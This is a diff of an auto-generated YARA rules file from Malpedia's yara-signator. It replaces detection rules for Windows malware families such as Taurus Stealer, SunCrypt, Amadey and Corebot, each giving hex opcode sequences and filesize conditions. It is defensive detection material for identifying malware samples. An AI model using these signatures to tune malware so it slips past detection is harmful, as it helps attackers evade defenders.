 		license_url = "N/A"
-		logic_hash = "b507e5914cce1955d65d2d9ef747d0eb1b6c8dbf2ed2455d47603f8c520d8766"
+		logic_hash = "33ae748771a6cb26fc0c416897ca1e808c4fe1a22bddffab51a85bc073a3f977"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120184,32 +120240,32 @@ rule MALPEDIA_Win_Bitsloth_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837de800 740e 8b4de8 8b11 8b45e8 50 }
-		$sequence_1 = { eb44 8b45f4 0345ec 8a48ff 884dfc 8b55f4 0355ec }
-		$sequence_2 = { 52 e8???????? 83c40c 8b45f8 83e801 8945f8 837df803 }
-		$sequence_3 = { 034df8 8b5508 898a90af0600 8b4508 81b890af060006010000 7310 8b4d08 }
-		$sequence_4 = { 8b5104 52 8b01 50 8b4df0 e8???????? c745fc00000000 }
-		$sequence_5 = { eb1b 68???????? 8b4df8 51 e8???????? 83c408 }
-		$sequence_6 = { 837df400 751b 6a00 6a00 6812c92300 e8???????? }
-		$sequence_7 = { 8b4d08 89487c 33c0 8b4dfc 33cd e8???????? 8be5 }
-		$sequence_8 = { 6a03 ff15???????? 8985f8ecffff 8d95e4ecffff 52 8d859cecffff 50 }
-		$sequence_9 = { 7515 6a00 6a00 68fa920300 e8???????? 83c40c 33c0 }
+		$sequence_0 = { a1???????? 894604 8bc6 5e c3 8bff }
+		$sequence_1 = { 33c5 8945fc 33c0 53 8bd9 33c9 }
+		$sequence_2 = { 83c00d b901000000 ba???????? e8???????? }
+		$sequence_3 = { 894df8 e8???????? 83c410 8bf3 e8???????? }
+		$sequence_4 = { 40 83f838 72dc b8???????? c3 33d2 3915???????? }
+		$sequence_5 = { 83f818 72dc b8???????? c3 }
+		$sequence_6 = { 85c0 7466 8b4b0c 8b5310 }
+		$sequence_7 = { 884ddf 8945e0 8945e4 8945e8 8945ec }
+		$sequence_8 = { 4a 7419 83ea02 753c 8b4508 }
+		$sequence_9 = { e8???????? 85c0 742e a1???????? 8d5001 }
 
 	condition:
-		7 of them and filesize < 677888
+		7 of them and filesize < 1827840
 }
-rule MALPEDIA_Win_Pickpocket_Auto : FILE
+rule MALPEDIA_Win_Curator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "802dc3e0-e29e-5fb9-b36e-fb6fbc442d76"
+		id = "88dd85f1-9cc3-5f60-833e-59e5ff5c2a14"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pickpocket_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.curator_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "22ebdc63d7f82763f33842db7356986ba14b78ce5a40d50ef0cdea3da00bc1be"
+		logic_hash = "ce369866ebd7e0f8a7ef01400f189e7f18bf8531561abd861592d244202fec85"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120223,32 +120279,32 @@ rule MALPEDIA_Win_Pickpocket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 740f b990cc0000 e8???????? }
-		$sequence_1 = { e8???????? 85c0 750f b962890100 }
-		$sequence_2 = { e8???????? 85c0 740f b990cc0000 e8???????? }
-		$sequence_3 = { eb05 b960cb0000 e8???????? eb02 33c0 }
-		$sequence_4 = { 790e b91dca0000 e8???????? 8907 }
-		$sequence_5 = { 7504 33c0 eb0a b9e8d70000 }
-		$sequence_6 = { 8a4201 84c0 7823 83e17f 0fb6c0 c1e107 03c8 }
-		$sequence_7 = { 7404 8b01 eb03 83c8ff 83f804 }
-		$sequence_8 = { a846 750f b99be00100 e8???????? e9???????? }
-		$sequence_9 = { b9dccc0000 e9???????? b9cecc0000 e9???????? b9c7cc0000 e9???????? }
+		$sequence_0 = { 488d4108 4889459f 488d5d8f 4883fa10 480f435d8f 4803d9 41b808000000 }
+		$sequence_1 = { 488b07 488d542420 488bcf ff9090000000 488bcd 48c1e903 488b4620 }
+		$sequence_2 = { 85c0 0f4ed0 e8???????? 488d15c2140400 488d4c2420 e8???????? cc }
+		$sequence_3 = { 5d c3 4883c202 488915???????? 0fbe0a 85c9 74bd }
+		$sequence_4 = { 8b45d8 e9???????? 0fbe42ff 488d4dd0 83c004 4863d0 488d05abbf0300 }
+		$sequence_5 = { 83e802 0f853ffaffff 660f6fa42400010000 660ffe2424 660f6fac24d0010000 660ffeac24d0000000 660f6fb424a0010000 }
+		$sequence_6 = { 4156 4157 4883ec50 488b7128 4c8d25880c0000 33ed 488bf9 }
+		$sequence_7 = { 488945e0 895128 488d0d332f0300 488b45d8 488908 488d0d950a0500 488b45d8 }
+		$sequence_8 = { 0fb68c2490000000 4c8d0501350300 4803da 4883f101 4803d9 482bfb 488bcb }
+		$sequence_9 = { ff15???????? 4885c0 7411 488bc8 ff15???????? 3bc6 0f84eb040000 }
 
 	condition:
-		7 of them and filesize < 1458176
+		7 of them and filesize < 1265664
 }
-rule MALPEDIA_Win_Spyeye_Auto : FILE
+rule MALPEDIA_Win_Suncrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5e5088a-e300-5034-889b-970db77fc21d"
+		id = "7f081e6a-91fb-536b-b660-2da418a7ac6f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spyeye_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.suncrypt_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "eb40febb6f1c9817c33c9124c37ea30f926a02c0c70087f7a1361d98282ccb0d"
+		logic_hash = "25c1a2f4bf5a2bd511d08d2068ef5b4858a377d650c7c729810ab075898356ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120262,32 +120318,32 @@ rule MALPEDIA_Win_Spyeye_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740e 837dfcff 7408 ff75fc }
-		$sequence_1 = { 8b65fc c9 c20800 55 8bec }
-		$sequence_2 = { 56 6880000000 6a04 56 6a07 6800000040 57 }
-		$sequence_3 = { ff7508 ffd0 8b65fc c9 c21400 55 8bec }
-		$sequence_4 = { ff750c e8???????? 8bd8 83fbff 751b 57 }
-		$sequence_5 = { 837dfcff 7408 ff75fc e8???????? 3bdf }
-		$sequence_6 = { 740a 83e0fe 50 57 }
-		$sequence_7 = { 6a02 eb08 56 6880000000 6a04 }
-		$sequence_8 = { 6a03 57 6a01 56 ff750c e8???????? }
-		$sequence_9 = { 50 e8???????? 85c0 7454 57 56 }
+		$sequence_0 = { 33d2 c68518ffffff6e c68519ffffff64 c6851affffff13 c6851bffffff2d c6851cffffff28 c6851dffffff28 }
+		$sequence_1 = { 0fbec0 33c1 884415c8 42 83fa1c 72e9 8d4dc8 }
+		$sequence_2 = { 6a00 6a00 6a00 6a00 ff35???????? be00310884 c745e000010000 }
+		$sequence_3 = { 0405 83f031 8845f9 8b45f0 0406 83f02e 8845fa }
+		$sequence_4 = { 8bec 8a5508 80fa2c 7446 a0???????? b9???????? 84c0 }
+		$sequence_5 = { ff15???????? 8bf0 85f6 742a 83feff 7425 8d45e8 }
+		$sequence_6 = { 8b7308 83c140 8b7da0 894df4 8b4df0 eb7e }
+		$sequence_7 = { 0f28dc 660ffe9df0fdffff 0f28c3 660fef45a0 0f28c8 660f72f00c 660f72d114 }
+		$sequence_8 = { 83fa11 72e8 ff7510 8d45ec 885dfd ff750c }
+		$sequence_9 = { 8bc3 85c9 7411 660f1f440000 803800 740b 47 }
 
 	condition:
-		7 of them and filesize < 741376
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Hazy_Load_Auto : FILE
+rule MALPEDIA_Win_Corebot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24c66e7b-2677-5514-927b-1f5ec58947dd"
+		id = "de56ab56-9ec7-5235-bd26-8fc91d55de2c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hazy_load_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.corebot_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "689a5f8205a52a844de3b9ea93f7ac4cdf01c931efdc00759c5c614c1c72cb27"
+		logic_hash = "7aa9c17958ef7c5a98a9be16ab271931413c5066734bfef2ec6f0b99a977cc0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120301,32 +120357,38 @@ rule MALPEDIA_Win_Hazy_Load_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d542420 442bc7 4803d0 4533c9 }
-		$sequence_1 = { 33d2 488bc8 4c8bf8 e8???????? 4c8bc6 41893f 498d4f08 }
-		$sequence_2 = { 488d35c3aa0100 eb16 488b3b 4885ff }
-		$sequence_3 = { 418be9 48c1f806 488d0db8200100 4183e23f }
-		$sequence_4 = { 4883ec20 8bd9 4c8d0d09c60000 b904000000 4c8d05f5c50000 488d15aeb20000 }
-		$sequence_5 = { 0f848d010000 83cfff 488d2ddf120100 83635000 83632c00 e9???????? }
-		$sequence_6 = { 0fb64201 84c0 744d 0fbec8 83e968 }
-		$sequence_7 = { 83fb08 7cd5 83fb08 0f8522010000 }
-		$sequence_8 = { 4883ec20 488d3d93690100 48393d???????? 742b }
-		$sequence_9 = { ff15???????? 48832300 4883c308 488d0551d50100 }
+		$sequence_0 = { 8b7df0 8d55f0 e8???????? 85c0 7411 837df000 }
+		$sequence_1 = { c7411407000000 8d4910 89c6 01c0 c1ee07 }
+		$sequence_2 = { 8932 5e c3 31c0 ebfa 55 89e5 }
+		$sequence_3 = { 8a1c08 84db 741c 01c8 }
+		$sequence_4 = { 8b06 85c0 743d 8b4e04 85c9 751a 83c604 }
+		$sequence_5 = { 50 ff15???????? 85c0 7418 8b0e 6a00 ff750c }
+		$sequence_6 = { 894dd8 b907000000 0fb618 895de8 }
+		$sequence_7 = { 85c0 894dec 7405 8b55e8 eb2c 8b45dc }
+		$sequence_8 = { e8???????? 807e5800 7509 ff7654 ff15???????? 807e5000 7509 }
+		$sequence_9 = { ff7010 ff7014 e8???????? 8b45e0 }
+		$sequence_10 = { eb10 6800800000 6a00 56 }
+		$sequence_11 = { ff15???????? 8d4634 50 ff15???????? 8d4e0c e8???????? }
+		$sequence_12 = { ff15???????? 807e5000 7509 ff764c ff15???????? 8d4634 50 }
+		$sequence_13 = { 85ff 740f 57 ff7508 }
+		$sequence_14 = { ff742428 e8???????? 8b442424 8d4c2410 }
+		$sequence_15 = { 85c0 7515 8b4624 3b4620 }
 
 	condition:
-		7 of them and filesize < 315392
+		7 of them and filesize < 1302528
 }
-rule MALPEDIA_Win_Victorygate_Auto : FILE
+rule MALPEDIA_Win_Chainshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad2b94f4-4fb4-597c-a815-1680fdce8561"
+		id = "c772e981-fe05-5ad7-89cb-7e4d2195fea3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.victorygate_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chainshot_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "f881de762583581b8f9cd5a6d8f43db0e0fda7800670c3d8d7443132f914f29e"
+		logic_hash = "d57daacb16b1510f9da9be332e06c34916e951db79264a72675c1b37600885e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120340,32 +120402,32 @@ rule MALPEDIA_Win_Victorygate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bd0 c645fc08 8d8d68ffffff e8???????? c645fc07 }
-		$sequence_1 = { ff75f8 8d8684010000 6a45 50 ff15???????? 85c0 }
-		$sequence_2 = { c645dc00 33d2 660fd645e4 8d4ddc e8???????? 68???????? 8d4dc4 }
-		$sequence_3 = { ff36 8bcf 50 e8???????? 8b4e08 83c334 83c634 }
-		$sequence_4 = { 8d4dc4 c645fc10 e8???????? 0fb64ddc 8bf8 8b45e4 8a17 }
-		$sequence_5 = { 56 682a2b0000 ffd0 85c0 7419 50 e8???????? }
-		$sequence_6 = { 50 ff7120 ff7128 e8???????? 83c410 85c0 7415 }
-		$sequence_7 = { 8b45f0 8d0c90 8b01 85c0 740d 395804 7408 }
-		$sequence_8 = { e8???????? 68???????? 8d4dc4 c645fc07 e8???????? 0fb64ddc 8bf8 }
-		$sequence_9 = { 668908 8bcf c7401000000000 c7401407000000 8d45b0 50 660fd645c0 }
+		$sequence_0 = { ffc9 7433 ffc9 7438 ffc9 742b ffc9 }
+		$sequence_1 = { 7427 83e803 0f844a110000 83f802 0f857b0f0000 }
+		$sequence_2 = { 7708 7519 66892c5e eb13 66892c5e bf7a000780 eb08 }
+		$sequence_3 = { eb23 8b4520 8906 eb1c b90b000080 eb05 }
+		$sequence_4 = { 83c705 c7041f4c8b4424 c6441f0418 83c705 c7041f4c8b4c24 }
+		$sequence_5 = { e8???????? 89442420 85c0 7826 }
+		$sequence_6 = { ffd0 8905???????? b90b000080 894c2420 e9???????? }
+		$sequence_7 = { 747a ffc8 7461 83e802 }
+		$sequence_8 = { 7408 ffd1 8905???????? b84b000080 }
+		$sequence_9 = { 0f8599000000 c705????????0b000000 e9???????? b902000000 }
 
 	condition:
-		7 of them and filesize < 1209344
+		7 of them and filesize < 802816
 }
-rule MALPEDIA_Win_Mongall_Auto : FILE
+rule MALPEDIA_Win_Neteagle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "084e4b5d-8f53-5615-8d00-9dc87d5afd58"
+		id = "32895ae7-ce57-521b-b8af-c26cb59a6de4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mongall"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mongall_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neteagle_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "a7343b890bc7cfe685e1d8a81a17e49736fde69b19000c5c5f4d58892316ec5a"
+		logic_hash = "cd9004d8f3e934bcdc5c7488fb3dbf59ca59052c62f38c8a57dd749c0498c5bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120379,34 +120441,34 @@ rule MALPEDIA_Win_Mongall_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75ef 57 bf???????? e8???????? 6a7f }
-		$sequence_1 = { 57 8bc2 c1f805 8b0485603f4100 8bfa 83e71f c1e706 }
-		$sequence_2 = { 83c404 5e b801000000 5b c3 83f806 7543 }
-		$sequence_3 = { 83c40c 8bdf 895df4 85c0 }
-		$sequence_4 = { ff15???????? 85f6 7413 6a00 6a00 6a00 }
-		$sequence_5 = { 85f6 7fdf eb07 838de4fdffffff 83bdccfdffff00 8b9de0fdffff 7457 }
-		$sequence_6 = { c745fc00000000 8b7df8 85ff 7509 }
-		$sequence_7 = { c745fc00000000 8b7df8 85ff 7509 5f 5e }
-		$sequence_8 = { 0fbe8028e24000 83e00f eb02 33c0 }
-		$sequence_9 = { 33c9 68???????? 51 6a03 }
+		$sequence_0 = { 8b86040c0000 40 8d0c40 c704ce02000000 e9???????? 8b54242c }
+		$sequence_1 = { 8b4c241c 52 53 50 51 ff15???????? 85c0 }
+		$sequence_2 = { 8b461c 85c0 0f849e010000 8bce e8???????? 85c0 0f848f010000 }
+		$sequence_3 = { 8bf8 6804010000 897c2424 c744242804010000 c744242c01000000 e8???????? 8b8c2464010000 }
+		$sequence_4 = { 8b4b24 03c8 89542901 8b4b24 8b542438 03c8 89542905 }
+		$sequence_5 = { 6a17 50 8bcb e8???????? 8d4da0 6a0f 8d55e0 }
+		$sequence_6 = { e8???????? 8b470c 83c604 8b0430 85c0 75e1 33f6 }
+		$sequence_7 = { a1???????? 83f801 7f82 5f 5e 5b 8b4dfc }
+		$sequence_8 = { 68???????? 52 ffd5 83c408 8d4c2440 85c0 0f94c3 }
+		$sequence_9 = { 894d98 8b8de4feffff 89559c 8945a0 8d95e8feffff 6a64 8d45d8 }
 
 	condition:
-		7 of them and filesize < 199680
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE
+rule MALPEDIA_Win_Amadey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b1a1c877-dafe-5bd8-aa9e-f033e2a7d793"
+		id = "1f098ad5-f3e6-509c-99f1-f0cffd69c9f4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taurus_stealer_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.amadey_auto.yar#L1-L210"
 		license_url = "N/A"
-		logic_hash = "45f5adaf95071a60a27cbbf5888b0c101a82ad499a857b2070bb83a96bceb96f"
+		logic_hash = "fb6578b6e50d377be8fb88ae4d5eeeb58ec3e463dc3822773f271e1c55398ad5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120418,32 +120480,43 @@ rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f9445d1 e8???????? 668945d2 8d4d94 8b45c4 8db778020000 3b45c8 }
-		$sequence_1 = { 8d45d0 50 8d45f4 50 e8???????? 50 8d45b8 }
-		$sequence_2 = { 8bce e8???????? 8bd0 c745f829674844 b129 c745fc4c130900 33c0 }
-		$sequence_3 = { 50 8d85c0feffff 50 8d4dcb e8???????? 8b85c4feffff 8d8d40ffffff }
-		$sequence_4 = { 33c0 304c05ed 40 83f806 7305 8a4dec }
-		$sequence_5 = { e8???????? 8bd0 c744242f74271706 6a07 58 88442436 b174 }
-		$sequence_6 = { f7c300200000 7414 81e3ffdfffff 8d8d04ffffff 895df8 e8???????? }
-		$sequence_7 = { 57 ffd0 8bf8 897d0c 83ffff 746f 8b9530ffffff }
-		$sequence_8 = { c1fa06 8bc7 83e03f 6bc838 8b049578c14300 f644082801 7421 }
-		$sequence_9 = { c74654c3280308 c7465881120d0e c7465ce58b8009 c74660d5208b07 c74664359ac202 c74668f19ad809 c7466ca13ba208 }
+		$sequence_0 = { 5b 8be5 5d c3 5f c6040e00 8bc6 }
+		$sequence_1 = { 57 ff15???????? 85c0 75d9 bb01000000 }
+		$sequence_2 = { 68???????? eb42 e8???????? 83f801 7431 e8???????? }
+		$sequence_3 = { 83ec18 8bcc 68???????? e8???????? 8d4db4 }
+		$sequence_4 = { 8a0402 88040f 41 8b7dfc 8d4201 }
+		$sequence_5 = { 68???????? e8???????? 8d4dcc e8???????? 83c418 }
+		$sequence_6 = { 0f434d20 40 50 52 6a02 6a00 51 }
+		$sequence_7 = { 83f811 7413 e8???????? 83f812 7409 6a01 68???????? }
+		$sequence_8 = { 68???????? e8???????? 8d4d98 e8???????? 83c418 }
+		$sequence_9 = { 8b8d78feffff 42 8bc1 81fa00100000 7214 }
+		$sequence_10 = { 83fa10 722f 8b8d78feffff 42 }
+		$sequence_11 = { 8b85f49fffff 40 89442404 8d85f8bfffff 890424 e8???????? }
+		$sequence_12 = { 8d55c8 89442404 891424 e8???????? 85c0 7523 }
+		$sequence_13 = { c745fc05000000 c70424???????? e8???????? 890424 e8???????? 84c0 }
+		$sequence_14 = { 8d85d8fdffff 890424 e8???????? e8???????? 89442404 }
+		$sequence_15 = { 89e5 b828200000 e8???????? 817d08???????? 0f84be000000 }
+		$sequence_16 = { e8???????? 8b45dc 890424 e8???????? 83ec04 }
+		$sequence_17 = { c745fc0c000000 8b45fc c9 c3 }
+		$sequence_18 = { 55 89e5 81ec48040000 e8???????? 89c2 c744241c00020000 8d85f8fbffff }
+		$sequence_19 = { 56 57 8b3d???????? 83ec18 }
+		$sequence_20 = { 722f 8b8d60feffff 42 8bc1 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 908288
 }
-rule MALPEDIA_Win_Cueisfry_Auto : FILE
+rule MALPEDIA_Win_Vanhelsing_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fc68627-9787-5873-a3fa-a9f7712605ab"
+		id = "02fe503d-2dc7-525c-81f0-efaa387cf55b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cueisfry_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vanhelsing"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vanhelsing_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c43c2b52de01a945341ae2efff0ffdd3edf0dcb4158573a62c18b687e85e4c2e"
+		logic_hash = "88005107b8dd0aed04a916a851d1dfdd2e8ac36a0ef3ce82f006aaa16cb30fa5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120457,32 +120530,32 @@ rule MALPEDIA_Win_Cueisfry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 8d8c24b8050000 68???????? 51 }
-		$sequence_1 = { 7517 8d8c24b0010000 68???????? 51 e8???????? }
-		$sequence_2 = { c3 81ec24030000 a1???????? 8b0d???????? }
-		$sequence_3 = { 8dbc2435010000 c684243401000000 68???????? f3ab 66ab 8d8c2438010000 51 }
-		$sequence_4 = { 8bee 33ff 85c9 89542430 896c2410 0f8ebd010000 8d4103 }
-		$sequence_5 = { b940000000 33c0 8dbc2435010000 c684243401000000 }
-		$sequence_6 = { 6aff 68???????? 64a100000000 50 64892500000000 81eca8070000 }
-		$sequence_7 = { 68???????? f3a5 50 e8???????? 8d4c2424 }
-		$sequence_8 = { 68???????? 50 c744242401000000 c744242000010000 }
-		$sequence_9 = { 51 8d442420 8bcc 89642430 50 c68424c401000003 }
+		$sequence_0 = { 5d c3 55 8bec 81ec9c000000 8b450c 53 }
+		$sequence_1 = { 8b4518 0f1000 0f1145cc 0f104010 8b01 8b4904 8945ec }
+		$sequence_2 = { 660f380035???????? 0f57c8 660f38000d???????? 0f29b520ffffff 0f294df0 0f28c6 660fd4c3 }
+		$sequence_3 = { 8b45e4 8b048598485600 8b4de0 f644082801 7515 e8???????? c70009000000 }
+		$sequence_4 = { 85c9 7410 8a80b4d44800 8806 46 41 897590 }
+		$sequence_5 = { 6a00 6a00 6800000008 ff15???????? 6a03 6a00 6a00 }
+		$sequence_6 = { 888570fbffff 240f 884580 8a06 888571fbffff 240f 884581 }
+		$sequence_7 = { 039d48ffffff 8b4dc8 138de8feffff 039df0feffff 898530ffffff 8bc3 138ddcfeffff }
+		$sequence_8 = { 7f4f 8d4608 50 8d85d8fbffff 68???????? 50 e8???????? }
+		$sequence_9 = { 0fb6cb c1e803 83e107 0fb67405dc 8d8514ffffff d3ee 83e601 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 2981888
 }
-rule MALPEDIA_Win_Guidloader_Auto : FILE
+rule MALPEDIA_Win_Hotcroissant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eceb0420-babc-5550-b00f-55949b1733ed"
+		id = "83ef5f77-5617-5f2c-aab4-e7c78e791ad8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.guidloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.guidloader_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hotcroissant_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "909d36bb63fb6009cd4cb0cf7912a67325d3ddd81af65c11026fd36fda233963"
+		logic_hash = "dce551f3abb53b003bc43a41a6cd9ea09bb62dbd64ab9e901fd3bd3c6af24937"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120496,32 +120569,32 @@ rule MALPEDIA_Win_Guidloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498bd4 e8???????? 837d1000 0f8659020000 44896c2428 488d5510 4c8bcf }
-		$sequence_1 = { 4d2bc8 418b51fc d3ea 4c894808 895018 410fb609 }
-		$sequence_2 = { 83f802 7711 488b4228 49394128 418b08 0f44cf }
-		$sequence_3 = { e8???????? 4533c0 4c8d0dcd72ffff 498b5508 0fb60a 83e10f 4a0fbe840920460100 }
-		$sequence_4 = { 4c8d442448 488d1532700000 33c9 ff15???????? 488b4c2448 85c0 }
-		$sequence_5 = { 418807 4c852e 764f ba30000000 49b80000000000000f00 6666660f1f840000000000 488b06 }
-		$sequence_6 = { 4889442460 4863842420010000 4889442468 0fb6842440010000 0f298c2480000000 0f280d???????? }
-		$sequence_7 = { 898c9564010000 49c1e820 453bcd 75d6 4585c0 742e 8b8560010000 }
-		$sequence_8 = { 410f1006 0f11442430 e9???????? 488bfe 4883cf0f 483bfb 7629 }
-		$sequence_9 = { 894208 f6c310 740a 418b02 4983c204 89420c 807c243000 }
+		$sequence_0 = { 52 6a00 68703a0000 6a00 }
+		$sequence_1 = { 6a00 c705????????00000000 ff15???????? 6a00 }
+		$sequence_2 = { 52 50 6a08 ff15???????? 50 ff15???????? 85c0 }
+		$sequence_3 = { ffd6 6800040000 68???????? 68???????? 68???????? ffd6 }
+		$sequence_4 = { 6a01 50 ff15???????? a1???????? 8b35???????? 50 ffd6 }
+		$sequence_5 = { 8b15???????? 33c0 52 a3???????? a3???????? a3???????? }
+		$sequence_6 = { 8b15???????? 52 ffd6 893d???????? }
+		$sequence_7 = { 56 57 683f000f00 33db 53 53 ff15???????? }
+		$sequence_8 = { ffd7 807c30ff5c 8b1d???????? 740a }
+		$sequence_9 = { 8b15???????? 33c0 52 a3???????? a3???????? }
 
 	condition:
-		7 of them and filesize < 49251328
+		7 of them and filesize < 591872
 }
-rule MALPEDIA_Win_Photolite_Auto : FILE
+rule MALPEDIA_Win_Shady_Hammock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53c3df95-9bf0-54a3-a4f4-6196a8124e14"
+		id = "dffdbcb2-bd98-5c78-b119-218bf0b8f1f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.photolite_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shady_hammock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shady_hammock_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "f9046ee3a914a22a767c3824ddb8832f1006b7774a4b79556e164865f1d4f92c"
